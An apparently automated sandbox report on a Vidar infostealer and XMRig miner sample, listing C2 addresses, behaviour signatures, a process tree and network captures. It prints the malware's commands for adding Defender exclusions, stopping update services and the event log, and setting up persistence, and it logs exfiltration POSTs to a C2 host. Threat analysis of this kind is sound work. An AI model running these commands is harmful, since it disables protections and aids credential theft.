Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    05/10/2024, 08:22 UTC

General

  • Target

    2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe

  • Size

    17.5MB

  • MD5

    1603ae955d010896283442534a8ad39c

  • SHA1

    90101b5164c138f227d7add871c1f629bd6d083d

  • SHA256

    34d99b2a6ed62e5080c9448ab3728066c6db5f997212ef71bd2705c79b19fc09

  • SHA512

    e1c8d2ba780d98ff7a845543d35fdf7a2f2092d66295d82cfa07a0d6b64dda58db913967e4f595538f43ac94e88d97e3bfb762205f5588a675ba9abd2ceadb9e

  • SSDEEP

    98304:E33JumYT82ylgsN0Nbh0pgnu99UHxh+VU1KSmv+4mn:A8hggIuh+VUvmmn

Malware Config

Extracted

Family

vidar

Version

11

Botnet

346a77fbabba142b23c256004b5a7c5d

C2

https://steamcommunity.com/profiles/76561199780418869

https://t.me/ae5ed

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0

Signatures

  • Detect Vidar Stealer 16 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • XMRig Miner payload 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 2 IoCs
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steals credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Power Settings 1 TTPs 12 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • UPX packed file 13 IoCs

    Detects executables packed with the open-source UPX packer or a modified variant of it.

  • Launches sc.exe 19 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3672
    • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1980
      • C:\ProgramData\HCFCAAEBGC.exe
        "C:\ProgramData\HCFCAAEBGC.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2344
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4072
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3612
          • C:\Windows\system32\wusa.exe
            wusa /uninstall /kb:890830 /quiet /norestart
            5⤵
            PID:4484
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop UsoSvc
          4⤵
          • Launches sc.exe
          PID:388
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop WaaSMedicSvc
          4⤵
          • Launches sc.exe
          PID:4392
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop wuauserv
          4⤵
          • Launches sc.exe
          PID:2504
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop bits
          4⤵
          • Launches sc.exe
          PID:3560
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop dosvc
          4⤵
          • Launches sc.exe
          PID:2588
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          4⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:4972
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          4⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:696
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          4⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:5032
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          4⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:3352
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
          4⤵
          • Launches sc.exe
          PID:4852
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
          4⤵
          • Launches sc.exe
          PID:2580
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop eventlog
          4⤵
          • Launches sc.exe
          PID:3100
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
          4⤵
          • Launches sc.exe
          PID:3344
      • C:\ProgramData\CGCFBFBGHD.exe
        "C:\ProgramData\CGCFBFBGHD.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:764
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2564
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1020
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AAFHIIDHJEBF" & exit
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3244
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 10
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:2312
  • C:\ProgramData\GoogleUP\Chrome\Updater.exe
    C:\ProgramData\GoogleUP\Chrome\Updater.exe
    1⤵
    • Drops file in Drivers directory
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4180
    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4996
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4488
      • C:\Windows\system32\wusa.exe
        wusa /uninstall /kb:890830 /quiet /norestart
        3⤵
        PID:1644
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      2⤵
      • Launches sc.exe
      PID:4948
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      2⤵
      • Launches sc.exe
      PID:2956
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      2⤵
      • Launches sc.exe
      PID:3268
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      2⤵
      • Launches sc.exe
      PID:3432
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      2⤵
      • Launches sc.exe
      PID:2760
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:4144
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:5036
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:532
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:2384
    • C:\Windows\system32\conhost.exe
      C:\Windows\system32\conhost.exe
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3388
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2224
      • C:\ProgramData\GoogleUP\Chrome\Updater.exe
        "C:\ProgramData\GoogleUP\Chrome\Updater.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2600
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2296
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3524
          • C:\Windows\system32\wusa.exe
            wusa /uninstall /kb:890830 /quiet /norestart
            5⤵
            PID:2580
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop UsoSvc
          4⤵
          • Launches sc.exe
          PID:756
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop WaaSMedicSvc
          4⤵
          • Launches sc.exe
          PID:4896
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop wuauserv
          4⤵
          • Launches sc.exe
          PID:4740
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop bits
          4⤵
          • Launches sc.exe
          PID:2608
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop dosvc
          4⤵
          • Launches sc.exe
          PID:1936
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          4⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:1052
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          4⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:4308
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          4⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:312
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          4⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:4804
        • C:\Windows\explorer.exe
          explorer.exe
          4⤵
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1220
    • C:\Windows\explorer.exe
      explorer.exe
      2⤵
      • Modifies data under HKEY_USERS
      • Suspicious use of AdjustPrivilegeToken
      PID:724
  • C:\Users\Admin\AppData\Roaming\service.exe
    C:\Users\Admin\AppData\Roaming\service.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2212
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4952
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:4448

Network

        • flag-us
          DNS
          209.205.72.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          209.205.72.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          88.210.23.2.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          88.210.23.2.in-addr.arpa
          IN PTR
          Response
          88.210.23.2.in-addr.arpa
          IN PTR
          a2-23-210-88.deploy.static.akamaitechnologies.com
        • flag-us
          DNS
          133.32.126.40.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          133.32.126.40.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          95.221.229.192.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          95.221.229.192.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          228.249.119.40.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          228.249.119.40.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          steamcommunity.com
          BitLockerToGo.exe
          Remote address:
          8.8.8.8:53
          Request
          steamcommunity.com
          IN A
          Response
          steamcommunity.com
          IN A
          104.82.234.109
        • flag-gb
          GET
          https://steamcommunity.com/profiles/76561199780418869
          BitLockerToGo.exe
          Remote address:
          104.82.234.109:443
          Request
          GET /profiles/76561199780418869 HTTP/1.1
          Host: steamcommunity.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Content-Type: text/html; charset=UTF-8
          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
          Expires: Mon, 26 Jul 1997 05:00:00 GMT
          Cache-Control: no-cache
          Date: Sat, 05 Oct 2024 08:22:43 GMT
          Content-Length: 34935
          Connection: keep-alive
          Set-Cookie: sessionid=401345caf6536c5d4b8d8477; Path=/; Secure; SameSite=None
          Set-Cookie: steamCountry=GB%7Ce15d564837abb028acb4e114150d704d; Path=/; Secure; HttpOnly; SameSite=None
        • flag-de
          GET
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          GET / HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:44 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-us
          DNS
          9.197.12.49.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          9.197.12.49.in-addr.arpa
          IN PTR
          Response
          9.197.12.49.in-addr.arpa
          IN PTR
          static.9.197.12.49.clients.your-server.de
        • flag-us
          DNS
          109.234.82.104.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          109.234.82.104.in-addr.arpa
          IN PTR
          Response
          109.234.82.104.in-addr.arpa
          IN PTR
          a104-82-234-109.deploy.static.akamaitechnologies.com
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HIJJEGDBFIIDGCAKJEBK
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 256
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:44 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:45 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFB
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:45 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEH
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 332
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:46 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHID
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 4661
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:46 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          GET
          https://49.12.197.9/sqlp.dll
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          GET /sqlp.dll HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:46 GMT
          Content-Type: application/octet-stream
          Content-Length: 2459136
          Connection: keep-alive
          Last-Modified: Saturday, 05-Oct-2024 08:22:46 GMT
          Cache-Control: no-store, no-cache
          Accept-Ranges: bytes
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJK
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 437
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:48 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBF
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 437
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:48 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          GET
          https://49.12.197.9/freebl3.dll
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          GET /freebl3.dll HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:48 GMT
          Content-Type: application/octet-stream
          Content-Length: 685392
          Connection: keep-alive
          Last-Modified: Saturday, 05-Oct-2024 08:22:48 GMT
          Cache-Control: no-store, no-cache
          Accept-Ranges: bytes
        • flag-de
          GET
          https://49.12.197.9/mozglue.dll
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          GET /mozglue.dll HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:49 GMT
          Content-Type: application/octet-stream
          Content-Length: 608080
          Connection: keep-alive
          Last-Modified: Saturday, 05-Oct-2024 08:22:49 GMT
          Cache-Control: no-store, no-cache
          Accept-Ranges: bytes
        • flag-de
          GET
          https://49.12.197.9/msvcp140.dll
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          GET /msvcp140.dll HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:49 GMT
          Content-Type: application/octet-stream
          Content-Length: 450024
          Connection: keep-alive
          Last-Modified: Saturday, 05-Oct-2024 08:22:49 GMT
          Cache-Control: no-store, no-cache
          Accept-Ranges: bytes
        • flag-de
          GET
          https://49.12.197.9/softokn3.dll
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          GET /softokn3.dll HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:49 GMT
          Content-Type: application/octet-stream
          Content-Length: 257872
          Connection: keep-alive
          Last-Modified: Saturday, 05-Oct-2024 08:22:49 GMT
          Cache-Control: no-store, no-cache
          Accept-Ranges: bytes
        • flag-de
          GET
          https://49.12.197.9/vcruntime140.dll
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          GET /vcruntime140.dll HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:50 GMT
          Content-Type: application/octet-stream
          Content-Length: 80880
          Connection: keep-alive
          Last-Modified: Saturday, 05-Oct-2024 08:22:50 GMT
          Cache-Control: no-store, no-cache
          Accept-Ranges: bytes
        • flag-de
          GET
          https://49.12.197.9/nss3.dll
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          GET /nss3.dll HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:50 GMT
          Content-Type: application/octet-stream
          Content-Length: 2046288
          Connection: keep-alive
          Last-Modified: Saturday, 05-Oct-2024 08:22:50 GMT
          Cache-Control: no-store, no-cache
          Accept-Ranges: bytes
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJK
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 1025
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:51 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIEC
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
